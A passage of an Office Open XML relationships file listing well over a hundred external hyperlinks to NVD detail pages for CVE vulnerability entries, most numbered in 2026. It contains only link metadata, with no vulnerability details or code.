Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101891" TargetMode="External" Id="rId23" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73640" TargetMode="External" Id="rId24" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86102" TargetMode="External" Id="rId25" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102422" TargetMode="External" Id="rId26" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73642" TargetMode="External" Id="rId27" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101081" TargetMode="External" Id="rId28" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101187" TargetMode="External" Id="rId29" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101260" TargetMode="External" Id="rId30" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101261" TargetMode="External" Id="rId31" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101262" TargetMode="External" Id="rId32" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101263" TargetMode="External" Id="rId33" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101264" TargetMode="External" Id="rId34" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101894" TargetMode="External" Id="rId35" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102268" TargetMode="External" Id="rId36" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102361" TargetMode="External" Id="rId37" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49994" TargetMode="External" Id="rId38" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82378" TargetMode="External" Id="rId39" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101074" TargetMode="External" Id="rId40" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101860" TargetMode="External" Id="rId41" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12264" TargetMode="External" Id="rId42" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12265" TargetMode="External" Id="rId43" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12268" TargetMode="External" Id="rId44" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12269" TargetMode="External" Id="rId45" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78424" TargetMode="External" Id="rId46" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85134" TargetMode="External" Id="rId47" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86595" TargetMode="External" Id="rId48" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86950" TargetMode="External" Id="rId49" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87741" TargetMode="External" Id="rId50" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88808" TargetMode="External" Id="rId51" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90926" TargetMode="External" Id="rId52" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100371" TargetMode="External" Id="rId53" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48100" TargetMode="External" Id="rId54" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54675" TargetMode="External" Id="rId55" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-95104" TargetMode="External" Id="rId56" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96538" TargetMode="External" Id="rId57" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2024-42002" TargetMode="External" Id="rId58" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101002" TargetMode="External" Id="rId59" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54674" TargetMode="External" Id="rId60" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54708" TargetMode="External" Id="rId61" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54710" TargetMode="External" Id="rId62" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75600" TargetMode="External" Id="rId63" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86530" TargetMode="External" Id="rId64" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87969" TargetMode="External" Id="rId65" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100750" TargetMode="External" Id="rId66" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101007" TargetMode="External" Id="rId67" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101008" TargetMode="External" Id="rId68" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101009" TargetMode="External" Id="rId69" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55157" TargetMode="External" Id="rId70" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101073" TargetMode="External" Id="rId71" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101188" TargetMode="External" Id="rId72" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101909" TargetMode="External" Id="rId73" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81375" TargetMode="External" Id="rId74" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101292" TargetMode="External" Id="rId75" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101901" TargetMode="External" Id="rId76" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101903" TargetMode="External" Id="rId77" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101906" TargetMode="External" Id="rId78" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54160" TargetMode="External" Id="rId79" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82383" TargetMode="External" Id="rId80" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91043" TargetMode="External" Id="rId81" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82323" TargetMode="External" Id="rId82" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82380" TargetMode="External" Id="rId83" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88805" TargetMode="External" Id="rId84" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93348" TargetMode="External" Id="rId85" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93355" TargetMode="External" Id="rId86" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102004" TargetMode="External" Id="rId87" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16513" TargetMode="External" Id="rId88" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18413" TargetMode="External" Id="rId89" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18414" TargetMode="External" Id="rId90" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-4556" TargetMode="External" Id="rId91" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45562" TargetMode="External" Id="rId92" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82348" TargetMode="External" Id="rId93" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82376" TargetMode="External" Id="rId94" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82379" TargetMode="External" Id="rId95" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82386" TargetMode="External" Id="rId96" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82928" TargetMode="External" Id="rId97" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97335" TargetMode="External" Id="rId98" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101905" TargetMode="External" Id="rId99" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55160" TargetMode="External" Id="rId100" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100751" TargetMode="External" Id="rId101" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101878" TargetMode="External" Id="rId102" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102276" TargetMode="External" Id="rId103" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102278" TargetMode="External" Id="rId104" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102281" TargetMode="External" Id="rId105" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101916" TargetMode="External" Id="rId106" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102243" TargetMode="External" Id="rId107" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102266" TargetMode="External" Id="rId108" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102267" TargetMode="External" Id="rId109" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102271" TargetMode="External" Id="rId110" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102272" TargetMode="External" Id="rId111" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102273" TargetMode="External" Id="rId112" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102334" TargetMode="External" Id="rId113" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82375" TargetMode="External" Id="rId114" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101012" TargetMode="External" Id="rId115" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101015" TargetMode="External" Id="rId116" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101066" TargetMode="External" Id="rId117" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101067" TargetMode="External" Id="rId118" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101280" TargetMode="External" Id="rId119" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101281" TargetMode="External" Id="rId120" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102245" TargetMode="External" Id="rId121" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102248" TargetMode="External" Id="rId122" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102249" TargetMode="External" Id="rId123" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12267" TargetMode="External" Id="rId124" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86330" TargetMode="External" Id="rId125" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96326" TargetMode="External" Id="rId126" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101091" TargetMode="External" Id="rId127" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102335" TargetMode="External" Id="rId128" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15952" TargetMode="External" Id="rId129" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52748" TargetMode="External" Id="rId130" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55096" TargetMode="External" Id="rId131" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87114" TargetMode="External" Id="rId132" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90925" TargetMode="External" Id="rId133" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93538" TargetMode="External" Id="rId134" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94286" TargetMode="External" Id="rId135" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97023" TargetMode="External" Id="rId136" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97024" TargetMode="External" Id="rId137" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97685" TargetMode="External" Id="rId138" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100392" TargetMode="External" Id="rId139" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101898" TargetMode="External" Id="rId140" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101907" TargetMode="External" Id="rId141" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102010" TargetMode="External" Id="rId142" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80357" TargetMode="External" Id="rId143" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101004" TargetMode="External" Id="rId144" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101083" TargetMode="External" Id="rId145" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101900" TargetMode="External" Id="rId146" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101902" TargetMode="External" Id="rId147" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101904" TargetMode="External" Id="rId148" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101908" TargetMode="External" Id="rId149" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101910" TargetMode="External" Id="rId150" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82935" TargetMode="External" Id="rId151" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91154" TargetMode="External" Id="rId152" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102247" TargetMode="External" Id="rId153" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18747" TargetMode="External" Id="rId154" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80359" TargetMode="External" Id="rId155" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93000" TargetMode="External" Id="rId156" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2024-58386" TargetMode="External" Id="rId157" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101040" TargetMode="External" Id="rId158" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101277" TargetMode="External" Id="rId159" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101279" TargetMode="External" Id="rId160" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101914" TargetMode="External" Id="rId161" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102275" TargetMode="External" Id="rId162" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102296" TargetMode="External" Id="rId163" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102365" TargetMode="External" Id="rId164" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102373" TargetMode="External" Id="rId165" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18417" TargetMode="External" Id="rId166" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19444" TargetMode="External" Id="rId167" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82385" TargetMode="External" Id="rId168" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82915" TargetMode="External" Id="rId169" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84744" TargetMode="External" Id="rId170" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93537" TargetMode="External" Id="rId171" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93540" TargetMode="External" Id="rId172" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94283" TargetMode="External" Id="rId173" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96740" TargetMode="External" Id="rId174" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82930" TargetMode="External" Id="rId175" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89303" TargetMode="External" Id="rId176" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101102" TargetMode="External" Id="rId177" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101105" TargetMode="External" Id="rId178" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101142" TargetMode="External" Id="rId179" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101144" TargetMode="External" Id="rId180" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101202" TargetMode="External" Id="rId181" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101203" TargetMode="External" Id="rId182" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101204" TargetMode="External" Id="rId183" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101205" TargetMode="External" Id="rId184" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101911" TargetMode="External" Id="rId185" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101912" TargetMode="External" Id="rId186" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101913" TargetMode="External" Id="rId187" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102414" TargetMode="External" Id="rId188" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 